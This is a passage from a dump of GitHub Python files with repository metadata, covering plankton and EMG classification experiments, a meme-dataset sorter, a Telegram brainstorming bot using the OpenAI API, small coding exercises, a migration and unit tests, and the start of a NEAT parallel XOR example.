Thu Apr 9 12:19:22 2020\n\n@author: rfuchs\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nfrom collections import Counter\nfrom sklearn.metrics import confusion_matrix, precision_score\nfrom imblearn.under_sampling import EditedNearestNeighbours, RandomUnderSampler\n\n\nos.chdir('C:/Users/rfuchs/Documents/GitHub/planktonPipeline/extract_Pulse_values')\n\n# Load nomenclature\ntn = pd.read_csv('train_test_nomenclature.csv')\ntn.columns = ['Particle_class', 'label']\n\n###################################################################################################################\n# Evaluate knn : Let the whole sample, should give an advantage \n###################################################################################################################\n\nfrom viz_functions import plot_2D\nfrom time import time\nfrom scipy.integrate import trapz\nfrom sklearn.neighbors import KNeighborsClassifier\n\nos.chdir('C:/Users/rfuchs/Documents/cyto_classif')\n\n\n#===========================================\n# Without undersampling\n#===========================================\n\nX_train = np.load('FUMSECK_L3/X_train610.npy')\ny_train = np.load('FUMSECK_L3/y_train610.npy')\n\nX_valid = np.load('FUMSECK_L3/X_valid610.npy')\ny_valid = np.load('FUMSECK_L3/y_valid610.npy')\n\nX_test = np.load('FUMSECK_L3/X_test610.npy')\ny_test = np.load('FUMSECK_L3/y_test610.npy')\n\n# Integrate the curves\nX_train_i = trapz(X_train, axis = 1)\nX_valid_i = trapz(X_valid, axis = 1)\nX_test_i = trapz(X_test, axis = 1)\n\nknn_perfs = pd.DataFrame(columns = ['k', 'micro', 'macro', 'weighted'])\n\nfor k in range(1,10):\n print(k)\n knn = KNeighborsClassifier(n_neighbors = k)\n knn.fit(X_train_i, y_train)\n y_pred_valid = knn.predict(X_valid_i)\n knn_perfs = knn_perfs.append({'k': k, 'micro': precision_score(y_valid, y_pred_valid, average = 'micro'), \\\n 'macro': precision_score(y_valid, y_pred_valid, average='macro'), \n 'weighted': precision_score(y_valid, y_pred_valid, average='weighted')}, \n ignore_index = True)\n\nplt.plot(knn_perfs['k'], knn_perfs['micro'])\nplt.plot(knn_perfs['k'], knn_perfs['macro'])\nplt.plot(knn_perfs['k'], knn_perfs['weighted'])\n\n# k = 2 seems to be best choice !\n\n\n#===========================================\n# With undersampling\n#===========================================\n\nX_train = np.load('FUMSECK_L3/X_train610.npy')\ny_train = 
np.load('FUMSECK_L3/y_train610.npy')\n\nX_valid = np.load('FUMSECK_L3/X_valid610.npy')\ny_valid = np.load('FUMSECK_L3/y_valid610.npy')\n\nX_test = np.load('FUMSECK_L3/X_test610.npy')\ny_test = np.load('FUMSECK_L3/y_test610.npy')\n\n\nX_integrated = trapz(X_train, axis = 1)\nX_integrated = pd.DataFrame(X_integrated, columns = ['SWS','FWS', 'FL Orange', 'FL Red', 'Curvature'])\ny = y_train.argmax(1)\n \n# ENN for cleaning data\nenn = EditedNearestNeighbours()\nX_rs, y_rs = enn.fit_resample(X_integrated, y) \n\nX_train = X_train.take(enn.sample_indices_, axis = 0)\ny_train = y_train.take(enn.sample_indices_, axis = 0)\n\n# Rus to decrease sample size\nbalancing_dict = Counter(np.argmax(y_train,axis = 1))\nfor class_, obs_nb in balancing_dict.items():\n if obs_nb > 3000:\n balancing_dict[class_] = 3000\n\n\nrus = RandomUnderSampler(sampling_strategy = balancing_dict)\nids = np.arange(len(X_train)).reshape((-1, 1))\nids_rs, y_train = rus.fit_sample(ids, y_train)\nX_train = X_train[ids_rs.flatten()] \n\n# Integrate the curves\nX_train_i = trapz(X_train, axis = 1)\nX_valid_i = trapz(X_valid, axis = 1)\nX_test_i = trapz(X_test, axis = 1)\n\n\nknn_perfs = pd.DataFrame(columns = ['k', 'micro', 'macro', 'weighted'])\n\nk = 2\nfor k in range(1,10):\n print(k)\n knn = KNeighborsClassifier(n_neighbors = k)\n knn.fit(X_train_i, y_train)\n y_pred_valid = knn.predict(X_valid_i)\n knn_perfs = knn_perfs.append({'k': k, 'micro': precision_score(y_valid, y_pred_valid, average = 'micro'), \\\n 'macro': precision_score(y_valid, y_pred_valid, average='macro'), \n 'weighted': precision_score(y_valid, y_pred_valid, average='weighted')}, \n ignore_index = True)\n\nplt.plot(knn_perfs['k'], knn_perfs['micro'])\nplt.plot(knn_perfs['k'], knn_perfs['macro'])\nplt.plot(knn_perfs['k'], knn_perfs['weighted'])\n\n# k = 2 seems to be best choice ! 
(without ENN)\n\n\n###################################################################################################################\n# Evaluate ConvNet \n###################################################################################################################\n\nfrom keras.models import load_model\n\n# Performance of the ConvNet\n# Load pre-trained model\nLottyNet = load_model('C:/Users/rfuchs/Documents/cyto_classif/LottyNet_FUMSECK') \ny_pred_conv = LottyNet.predict(X_test)\n\nprecision_score(np.argmax(y_test, 1), np.argmax(y_pred_conv, 1), average = 'micro')\nprecision_score(np.argmax(y_test, 1), np.argmax(y_pred_conv, 1), average = 'macro')\nprecision_score(np.argmax(y_test, 1), np.argmax(y_pred_conv, 1), average = 'weighted')\n\n\n\n###################################################################################################################\n# Final word : Small win of ConvNet\n###################################################################################################################\n\n# Recap:\n# Without undersampling\n# 2-nn not us 2-nn rus 2-nn rus enn 2-nn enn Convnet\n# micro 0.884963 0.868984 0.844333 0.846938 0.937246\n# macro 0.532623 0.500137 0.491953 0.499227 0.500073\n# weighted 0.964046 0.954315 0.953897 0.955663 0.970292\n\n# Wins on micro: +5 percentage points, loses 3 on macro and gains 0.6 on weighted\n# Some of the small classes are a bit better represented by knn on the WHOLE DATASET\n# When the dataset size is reduced, the NN really wins\n\n\n","repo_name":"RobeeF/planktonPipeline","sub_path":"extract_Pulse_values/knn_vs_Lottynet.py","file_name":"knn_vs_Lottynet.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11193112251","text":"import json\nimport os\nimport shutil\n\n# Define the paths\ndata_dir = '/home/rajat/Desktop/HateFul_Memes_Dataset/data'\njson_file = os.path.join(data_dir, 'train.jsonl')\nimage_dir = data_dir\n\n# Read the JSONL file\nwith open(json_file, 'r') as file:\n lines = file.readlines()\n\n# Process each line in the JSONL file\nfor line in lines:\n data = json.loads(line)\n label = data['label']\n image_filename = data['img']\n\n # Source and destination paths\n source_path = os.path.join(image_dir, image_filename)\n output_dir = os.path.join(data_dir, f'label_{label}')\n\n if os.path.isfile(source_path):\n os.makedirs(output_dir, exist_ok=True)\n destination_path = os.path.join(output_dir, image_filename)\n\n try:\n # Copy the image\n shutil.copy(source_path, destination_path)\n\n # Remove the original\n os.remove(source_path)\n\n except Exception as e:\n print(f"Error occurred: {e}")\n else:\n print(f"File {source_path} does not exist. 
Skipping...\")\n\nprint(\"Images separated based on labels.\")\n","repo_name":"rajat397/Meme-Based-CyberBullying-Detection","sub_path":"scripts/splitting_facebook_dataset_script.py","file_name":"splitting_facebook_dataset_script.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42463495987","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 25 10:11:21 2019\r\n\r\n@author: Marina\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\nimport scipy.io\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport preprocessing_capgmyo \r\n\r\ndataDir = r'C:\\Users\\Marina\\Desktop\\CAPGMYO\\Capgmyo_dbc_preprocessed'\r\n\r\nX_data=[]\r\nY_data=[]\r\ne=0\r\nfor subject in range(1, 10):\r\n for g in range(1,13):\r\n# for d in range(len(dataDir)): \r\n for rep in range(1,11):\r\n file = dataDir+'/{:03d}-{:03d}-{:03d}.mat'.format(int(subject),int(g),int(rep))\r\n emg_data = scipy.io.loadmat(file)\r\n x_electrode_arr = np.zeros((1000,8))\r\n x = emg_data['data'].copy()\r\n x = preprocessing_capgmyo.lpf(x)\r\n# print(x[:,16:32].mean(axis=-1).shape)\r\n# for t in range(8):\r\n# x_electrode_arr[:][t:t] = np.mean(x[:,e:e+16],axis=-1)\r\n# e=e+16\r\n \r\n x_electrode_arr[:,0] = np.mean(x[:,0:16],axis=-1)\r\n x_electrode_arr[:,1] = np.mean(x[:,16:32],axis=-1)\r\n x_electrode_arr[:,2] = np.mean(x[:,32:48],axis=-1)\r\n x_electrode_arr[:,3] = np.mean(x[:,48:64],axis=-1)\r\n x_electrode_arr[:,4] = np.mean(x[:,64:80],axis=-1)\r\n x_electrode_arr[:,5] = np.mean(x[:,80:96],axis=-1)\r\n x_electrode_arr[:,6] = np.mean(x[:,96:112],axis=-1)\r\n x_electrode_arr[:,7] = np.mean(x[:,112:128],axis=-1)\r\n \r\n X_data.append(x_electrode_arr)\r\n \r\n Y_data.append(int(np.squeeze(emg_data['gesture'])))\r\n \r\n\r\n\r\n \r\n# 1. Use middle segment of signals to compute the mean\r\n \r\nX_segm = np.zeros((len(X_data), 340, 8))\r\nY_segm = np.zeros((len(Y_data),340,1))\r\nfor i in range(len(X_data)):\r\n m = len(X_data[i]) // 2\r\n X_segm[i,:,:] = X_data[i][m-170: m+170, :]\r\n\r\nplt.figure(figsize=(20,20))\r\n# 2. For every gesture compute and plot mean\r\n\r\n\r\n\r\nfor label in range(1,13):\r\n l=[]\r\n for k in range(len(Y_data)):\r\n if Y_data[k]==label:\r\n \r\n l.append(k) \r\n \r\n x_mean = [X_segm[j] for j in l] \r\n\r\n xm = np.mean(x_mean,axis=0)\r\n plt.subplot(4,3,label)\r\n plt.plot(xm)\r\n plt.title('gesture {}'.format(label))\r\nplt.legend(['electrode-{}'.format(i+1) for i in range(8)], bbox_to_anchor=(1.1, 1.05))\r\nplt.savefig('ground_truth_capgmyo.png')\r\nplt.show()\r\n\r\n\r\n\r\n ","repo_name":"DSIP-UPatras/sEMG-based-gesture-recognition-mgeorgoula","sub_path":"code/part_a/dbc_capgmyo/ground_truth_capgmyo.py","file_name":"ground_truth_capgmyo.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"34320494694","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nimport subprocess\n\n\ndef getFileLocationThroughoutCurrentPath(fileName, currentPath='.'):\n previousDirectory = None\n currentDirectory = currentPath if currentPath != '.' 
else os.getcwd()\n while previousDirectory != currentDirectory:\n fileLocation = os.path.join(currentDirectory, fileName)\n if os.path.isfile(fileLocation):\n return fileLocation\n previousDirectory = currentDirectory\n currentDirectory = os.path.dirname(previousDirectory)\n return None\n\n\n# Entry-point\nif __name__ == \"__main__\":\n statTool = getFileLocationThroughoutCurrentPath('stat/stat_main.py')\n if statTool is None:\n print(\"fatal: STAT tool wasn't found\")\n sys.exit(-1)\n else:\n cmd = [sys.executable, \"-m\", \"cProfile\", statTool]\n cmd.extend(sys.argv[1:])\n try:\n process = subprocess.Popen(cmd, bufsize=1, universal_newlines=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n with open('_stat_profiling.txt', 'w') as fp:\n for line in iter(process.stdout.readline, ''):\n print(line, end='')\n fp.write(line)\n fp.flush()\n process.wait()\n sys.exit(process.returncode)\n except OSError as e:\n print(\"fatal: unable to start STAT\")\n print(\"fatal: %s\" % e)\n sys.exit(e.errno)\n","repo_name":"westerndigitalcorporation/stat","sub_path":"lib/tests/profilestat.py","file_name":"profilestat.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"29507226652","text":"#4\nmy_list = ['инженер-конструктор Игорь', 'главный бухгалтер МАРИНА', 'токарь высшего разряда нИКОЛАй', 'директор аэлита']\nname_list = [] # build a list containing only the employees' names\nremoved_1 = my_list.pop(0) # pop the string containing the employee's name\nremoved_1 = removed_1.title() # while we still have the string, capitalize the first letter of every word\nremoved_2 = my_list.pop(0)\nremoved_2 = removed_2.title()\nremoved_3 = my_list.pop(0)\nremoved_3 = removed_3.title()\nremoved_4 = my_list.pop(0)\nremoved_4 = removed_4.title()\n\n#print(my_list)\n#print(removed_1)\n#print(removed_2)\n#print(removed_3)\n#print(removed_4)\n\nfor i in removed_1:\n name_1 = (removed_1[removed_1.index(' '):]) # store the employee's name in a variable by slicing relative to the index of the space\nname_list.append(name_1) # put the employee's name into the list of names\n\nfor i in removed_2:\n name_2 = (removed_2[-removed_2.index(' '):])\nname_list.append(name_2)\n\nfor i in removed_3:\n name_3 = (removed_3[-removed_3.index(' '):]) # there is a problem with the name Nikolai - couldn't figure out how to solve it\nname_list.append(name_3)\n\nfor i in removed_4:\n name_4 = (removed_4[removed_4.index(' '):])\nname_list.append(name_4)\n\n#print(name_1)\n#print(name_2)\n#print(name_3)\n#print(name_4)\n#print(name_list)\n\nfor i in name_list:\n print(\"Привет, \" + i)","repo_name":"kazimiroff/repo-gui","sub_path":"Kazimirov_Dmitry_dz_2/DZ_2_task_4.py","file_name":"DZ_2_task_4.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26633063800","text":"from importlib import import_module as im\nfrom data_marketplace.utils.common import to_byte\nfrom data_marketplace.utils.log import logging\n\nlog = logging.getLogger('data_marketplace.crypto.hash')\n\ndef _hash(contents, hash_algo):\n log.info(\n \"Hashing the file.\\n\\\n Hash object: %s,\\n\\\n Hash function: %s\", id(contents), hash_algo)\n\n return _get_digest(contents, hash_algo)\n\ndef _validate(origin, target, hash_algo):\n digest = _get_digest(origin, hash_algo)\n calculated = digest.hexdigest()\n log.info('Calculated Hash: %s\\n'\n 'Target Hash: %s', calculated, target)\n if calculated == target:\n return True\n else:\n return 
False\n\ndef _get_digest(contents, hash_algo):\n module_name = hash_algo.upper() \n contents_byte = to_byte(contents)\n return im('Crypto.Hash.' + module_name).new(contents_byte)","repo_name":"grandq33769/gdpr-data-marketplace","sub_path":"data_marketplace/crypto/hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13851475003","text":"\"\"\"Inicial\n\nRevision ID: 4f5c44e435a5\nRevises: 080cfa6e9650\nCreate Date: 2023-02-02 16:42:23.309875\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4f5c44e435a5'\ndown_revision = '080cfa6e9650'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('produto', sa.Column('tamanho', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('produto', 'tamanho')\n # ### end Alembic commands ###\n","repo_name":"GuilhermeMPG/Backend_AppBLX","sub_path":"alembic/versions/4f5c44e435a5_inicial.py","file_name":"4f5c44e435a5_inicial.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13511800708","text":"import unittest\nimport os\nimport sys\n\nimport cv2 as cv\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),\n '..', '..')))\n\nfrom opencv_stitching.megapix_scaler import MegapixScaler\nfrom opencv_stitching.megapix_downscaler import MegapixDownscaler\n#%%\n\n\nclass TestScaler(unittest.TestCase):\n\n def setUp(self):\n self.img = cv.imread(\"s1.jpg\")\n self.size = (self.img.shape[1], self.img.shape[0])\n\n def test_get_scale_by_resolution(self):\n scaler = MegapixScaler(0.6)\n\n scale = scaler.get_scale_by_resolution(1_200_000)\n\n self.assertEqual(scale, 0.7071067811865476)\n\n def test_get_scale_by_image(self):\n scaler = MegapixScaler(0.6)\n\n scaler.set_scale_by_img_size(self.size)\n\n self.assertEqual(scaler.scale, 0.8294067854101966)\n\n def test_get_scaled_img_size(self):\n scaler = MegapixScaler(0.6)\n scaler.set_scale_by_img_size(self.size)\n\n size = scaler.get_scaled_img_size(self.size)\n self.assertEqual(size, (1033, 581))\n # 581*1033 = 600173 px = ~0.6 MP\n\n def test_force_of_downscaling(self):\n normal_scaler = MegapixScaler(2)\n downscaler = MegapixDownscaler(2)\n\n normal_scaler.set_scale_by_img_size(self.size)\n downscaler.set_scale_by_img_size(self.size)\n\n self.assertEqual(normal_scaler.scale, 1.5142826857233715)\n self.assertEqual(downscaler.scale, 1.0)\n\n\ndef starttest():\n unittest.main()\n\n\nif __name__ == \"__main__\":\n starttest()\n","repo_name":"alanross/AlvaAR","sub_path":"src/libs/opencv/apps/opencv_stitching_tool/opencv_stitching/test/test_megapix_scaler.py","file_name":"test_megapix_scaler.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"3"} +{"seq_id":"38869430023","text":"import telebot\nimport os\nimport openai\nimport json\n\nfrom functools import partial\n\n#TODO: read from env\nopenai.organization = os.getenv('BRAINSTORMER_OPENAI_ORG')\nopenai.api_key = os.getenv('BRAINSTORMER_OPENAI_KEY')\n\nBOT_TOKEN=os.getenv('BOT_TOKEN')\n\nCOMMANDS = { \n 'help' : 'Gives you information about the available 
commands',\n 'topic' : 'Set the ideas topic',\n 'debug' : 'Get the session debug info',\n 'yes' : 'Accept last suggested option',\n 'no' : 'Deny last suggested option'\n}\n\nIDEA_PROMPT = \"\"\"\nYou need the user to suggest an idea and then stop the conversation. You only speak JSON, do not write normal text. If you detect the user has an idea include it in the JSON response in the attribute \"idea\" and finish the conversation saying thanks.\n\"\"\"\n\nBRAINSTORMING_SESSION_PROMPT=\"\"\"\n# Brainstorming session\nThis document keeps track of possible ideas for a brainstorming session.\n\n## Ideas format\nThe ideas list is a well formed CSV document. Where the columns will be separated by the character `|` like:\ntitle | description\nFirst title | First description\nSecond title | Second description\n\nThe document will have a list of ideas and every idea will have the columns \"title\" with a name for the idea and \"description\" with the idea description.\n\n## Ideas for: {topic}\n\n{user_inputs_text}\n\n### Selected ideas\n{previous_text}\n\n{question_text}\ntitle | description\n\n\"\"\"\n\nDEBUG_TEMPLATE=\"\"\"\nTopic: {}\n\nCurrent list of pending ideas:\n{}\n\nCurrent list of bad ideas:\n{}\n\nCurrent list of good ideas:\n{}\"\"\"\n\nPREVIOUS_TEXT_TEMPLATE = \"\"\"\ntitle | description\n{}\n\"\"\"\n\nSUMMARY_PROMPT=\"\"\"\n# Ideas for: {topic}\n## Selected ideas\n{current_text}\n---\n## Pros and cons for every idea\n### {first_option}\nPros:\n- \"\"\"\n\nclass UserData:\n def __init__(self):\n self._user_data = {}\n\n def clear(self, id):\n self._user_data[id] = {\n 'topic': None,\n 'extra': [],\n 'good': [],\n 'bad': [],\n 'options': []\n } \n\n def add_topic(self, id, topic):\n self._user_data[id] = {\n 'topic': topic,\n 'extra': [],\n 'good': [],\n 'bad': [],\n 'options': []\n }\n\n def debug(self, id):\n user = self._user_data[id]\n return DEBUG_TEMPLATE.format(user['topic'], \"\\n\".join(user['options']), \"\\n\".join(user['bad']), \"\\n\".join(user['good'])) \n \n def current_option(self, id):\n return self._user_data.get(id)['options'][0]\n\n def get_user(self, id):\n return self._user_data.get(id)\n\n def get_topic(self, id):\n return self._user_data.get(id, {}).get('topic')\n\n def accept_current_option(self, id, extra_text=\"\"):\n user = self.get_user(id)\n if (user['options']):\n option = user['options'].pop(0)\n user['good'].append(option)\n if extra_text:\n user['extra'].append(extra_text)\n\n def deny_current_option(self, id):\n user = self.get_user(id)\n if (user['options']):\n option = user['options'].pop(0)\n user['bad'].append(option)\n\n def has_options(self, id):\n user = self.get_user(id)\n return len(user['options']) > 0\n\n def prompt(self, id):\n user = self.get_user(id)\n previous_list = \"\"\n\n previous_text = \"\"\n if user['good']:\n previous_list = \", \".join([\"\\\"{}\\\"\".format(p.split(\"|\")[0].strip()) for p in user['good']])\n previous_text = PREVIOUS_TEXT_TEMPLATE.format(\"\\n\".join(user['good']))\n\n user_inputs_text = \"\"\n if user['extra']:\n user_inputs_text = \",\".join(user['extra'])\n\n if previous_list:\n question_text = \"The next best 5 ideas that based combine ideas from {} are:\".format(previous_text)\n else:\n question_text = \"The next best 5 ideas are:\"\n\n prompt = BRAINSTORMING_SESSION_PROMPT.format(\n topic=user['topic'], \n user_inputs_text=user_inputs_text,\n previous_text=previous_text,\n question_text=question_text)\n\n print (\"prompt\", prompt)\n\n completion = openai.Completion.create(\n 
model=\"text-davinci-003\",\n presence_penalty=1,\n temperature=0.6,\n top_p=1,\n best_of=1,\n frequency_penalty=1,\n max_tokens=512,\n prompt=prompt)\n\n # user['options'] = completion.choices[0].text.split(\"\\n\")[1:]\n lines = completion.choices[0].text.split(\"\\n\")\n user['options'] = [a.strip() + \" | \" + b.strip() for a, b in [line.split(\"|\") for line in lines if line.strip()]]\n return user['options']\n\nuser_data = UserData()\nbot = telebot.TeleBot(BOT_TOKEN)\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n user_id = message.chat.id\n help_text = \"The following commands are available: \\n\"\n for key in COMMANDS: # generate help text out of the commands dictionary defined at the top\n help_text += \"/\" + key + \": \"\n help_text += COMMANDS[key] + \"\\n\"\n bot.send_message(user_id, help_text) # send the generated help page\n\n\ndef suggest_next_option(user_id, prompt=False):\n if not user_data.has_options(user_id) or prompt:\n user_data.prompt(user_id)\n \n option = user_data.current_option(user_id)\n bot.send_message(user_id, option + \" (/yes /no)\")\n\n@bot.message_handler(commands=['restart'])\ndef restart(message): \n user_id = message.chat.id\n user_data.clear(user_id)\n\n\n@bot.message_handler(commands=['topic'])\ndef set_topic(message): \n user_id = message.chat.id\n user_data.add_topic(user_id, message.text.replace(\"/topic\", \"\").strip())\n suggest_next_option(user_id)\n\n\n@bot.message_handler(commands=['finish'])\ndef set_topic(message): \n user_id = message.chat.id\n user = user_data.get_user(user_id)\n topic = user_data.get_topic(user_id)\n current_text = \"\"\n first_option = \"\"\n if user['good']:\n current_text = user['good'][-1]\n first_option = user['good'][-1].split(\"|\")[0]\n\n prompt = SUMMARY_PROMPT.format(topic=topic, first_option=first_option, current_text=current_text)\n\n completion = openai.Completion.create(\n model=\"text-davinci-003\",\n presence_penalty=2,\n temperature=0.5,\n top_p=1,\n best_of=1,\n frequency_penalty=0,\n max_tokens=512,\n prompt=prompt)\n\n prompt = prompt + completion.choices[0].text + \"\\n## Summary\\n\"\n\n completion = openai.Completion.create(\n model=\"text-davinci-003\",\n presence_penalty=1,\n temperature=0.1,\n top_p=1,\n best_of=1,\n frequency_penalty=0.2,\n max_tokens=512,\n prompt=prompt)\n\n result = prompt + completion.choices[0].text\n bot.send_message(user_id, result.split(\"---\")[1].strip()) \n user_data.clear(user_id)\n \n\ndef process_option(option, options, message):\n user_id = message.chat.id\n response = message.text\n if message.text == 'yes':\n user_data.add_good(user_id, option)\n else:\n user_data.add_bad(user_id, option)\n\n if not options:\n options = user_data.prompt(user_id)\n\n option = options.pop(0)\n bot.send_message(message.chat.id, option)\n bot.register_next_step_handler(message, partial(process_option, option, options))\n\n@bot.message_handler(commands=['yes'])\ndef accept_option(message): \n user_id = message.chat.id\n user_data.accept_current_option(user_id, message.text.replace(\"/yes\", \"\"))\n suggest_next_option(user_id, True)\n print(user_data.get_user(user_id))\n\n\n@bot.message_handler(commands=['no'])\ndef deny_option(message): \n user_id = message.chat.id\n user_data.deny_current_option(user_id)\n suggest_next_option(user_id)\n\n\n@bot.message_handler(commands=['debug'])\ndef debug(message): \n\tuser_id = message.chat.id\n\tbot.reply_to(message, user_data.debug(user_id))\n\n\n#Handle all other messages\n@bot.message_handler(func=lambda m: True)\ndef 
general_messages(message):\n # bot.send_message(message.chat.id, \"Unknown command\")\n # help(message)\n user_id = message.chat.id\n topic = user_data.get_topic(user_id)\n\n if not topic:\n messages = [\n {\"role\": \"assistant\", \"content\": IDEA_PROMPT},\n {\"role\": \"user\", \"content\": message.text}\n ]\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=messages,\n temperature=0.1\n )\n\n content = response[\"choices\"][0][\"message\"].content\n\n print(content)\n\n try:\n content = json.loads(content)\n if content.get(\"idea\"):\n user_data.add_topic(user_id, content.get(\"idea\"))\n suggest_next_option(user_id)\n elif not content.get(\"end_conversation\"):\n bot.send_message(user_id, content.get(\"message\"))\n else:\n user_data.add_topic(user_id, message.text)\n suggest_next_option(user_id)\n\n except ValueError as err:\n bot.send_message(user_id, content)\n\n else:\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=\"\"\"\nClassify the following text as: \n- \"affirmative\": if the user is saying yes, ok, or something similar\n- \"negative\": if the user is saying no, or something similar\n- \"idea\": if the users is suggesting to speak about a new topic or is interested on it. Include an attribute idea with the topic.\n- \"unknown\": if you don't understand what the user says\n\nThe output must be a valid json including a message explaining to the user what you understood and why you made that decision.\n\nAn output example:\n```\n{{\n \"classification\": \"affirmative\",\n \"message\": \"I understood that you said 'sure', which is an affirmative answer.\"\n}}\n```\n\nText: \"{}\"\n\"\"\".format(message.text),\n temperature=0.1,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n content = response[\"choices\"][0][\"text\"]\n\n print(\"content\", content)\n\n try:\n content = json.loads(content)\n classification = content.get(\"classification\")\n print(\"classification\", classification)\n if classification == \"affirmative\" or content.get(\"affirmative\"):\n accept_option(message)\n elif classification == \"negative\" or content.get(\"nevagite\"):\n deny_option(message)\n elif classification == \"idea\":\n user_data.add_topic(user_id, message.text)\n bot.send_message(user_id, content.get(\"message\"))\n suggest_next_option(user_id) \n else:\n bot.send_message(user_id, content.get(\"message\"))\n\n except ValueError as err:\n bot.send_message(user_id, content)\n\nbot.polling()","repo_name":"PIWEEK/brainstormer","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69899822802","text":"#!/usr/lib/anaconda3/bin/python\n#!C:\\staging\\python\\systems\\Scripts\\python.exe\n# -*- coding: utf-8 -*-\n\"\"\" codec.py\n\nChallenges: https://www.lintcode.com/problem/encode-and-decode-strings/description\nSolutions:\nDescription:\nAttributes:\n __version__ = \"1.0.0\"\n __project__ = pilot\n __author__ = Jeremy Sung\n __date__ = 8/23/2018 3:04 PM\n __Email__ = Jeremy.Sung@osh.com\n\n\"\"\"\n\n\nclass codec:\n\n def encode(self, strs):\n \"\"\"\n @param: strs: a list of strings\n @return: encodes a list of strings to a single string.\n \"\"\"\n return \" \".join(strs)\n\n def decode(self, str):\n \"\"\"\n @param: str: A string\n @return: dcodes a single string to a list of strings\n \"\"\"\n return str.split()\n\n\n\n\n\n\nif __name__ == \"__main__\":\n codec = 
codec()\n\n strs = [\"lint\",\"code\",\"love\",\"you\"] ## string encoded_string = encode(strs)\n encoded_string = codec.encode(strs)\n\n print(codec.decode(encoded_string)) ## return [\"lint\",\"code\",\"love\",\"you\"] when you call decode(encoded_string)\n\n\n\n","repo_name":"Jeremy-Sung-Dev/staging","sub_path":"python/libs_dev/codec.py","file_name":"codec.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"13536422360","text":"#!/usr/bin/python3\n\n\"\"\"\nmodule for island_perimeter\n\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"\n returns the perimeter of the island described in grid\n \"\"\"\n perimeter = 0\n\n rows = len(grid)\n cols = len(grid[0])\n\n for row in range(rows):\n for col in range(cols):\n grid_cell = grid[row][col]\n if grid_cell == 1:\n perimeter += 4\n if row != 0 and grid[row - 1][col] == 1:\n perimeter -= 1\n if col != 0 and grid[row][col - 1] == 1:\n perimeter -= 1\n if row + 1 != rows and grid[row + 1][col] == 1:\n perimeter -= 1\n if col + 1 != cols and grid[row][col + 1] == 1:\n perimeter -= 1\n\n return perimeter\n","repo_name":"bmn44100/alx-interview","sub_path":"0x09-island_perimeter/0-island_perimeter.py","file_name":"0-island_perimeter.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25175613891","text":"\"\"\"\nA parallel version of XOR using neat.parallel.\n\nSince XOR is a simple experiment, a parallel version probably won't run any\nfaster than the single-process version, due to the overhead of\ninter-process communication.\n\nIf your evaluation function is what's taking up most of your processing time\n(and you should check by using a profiler while running single-process),\nyou should see a significant performance improvement by evaluating in parallel.\n\nThis example is only intended to show how to do a parallel experiment\nin neat-python. You can of course roll your own parallelism mechanism\nor inherit from ParallelEvaluator if you need to do something more complicated.\n\"\"\"\n\nimport multiprocessing\nimport os\n\nimport neat\nimport visualize\n\n# 2-input XOR inputs and expected outputs.\nxor_inputs = [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 1.0)]\nxor_outputs = [(0.0,), (1.0,), (1.0,), (0.0,)]\n\n\ndef eval_genome(genome, config):\n \"\"\"\n This function will be run in parallel by ParallelEvaluator. It takes two\n arguments (a single genome and the genome class configuration data) and\n should return one float (that genome's fitness).\n\n Note that this function needs to be in module scope for multiprocessing.Pool\n (which is what ParallelEvaluator uses) to find it. Because of this, make\n sure you check for __main__ before executing any code (as we do here in the\n last few lines in the file), otherwise you'll have made a fork bomb\n instead of a neuroevolution demo. 
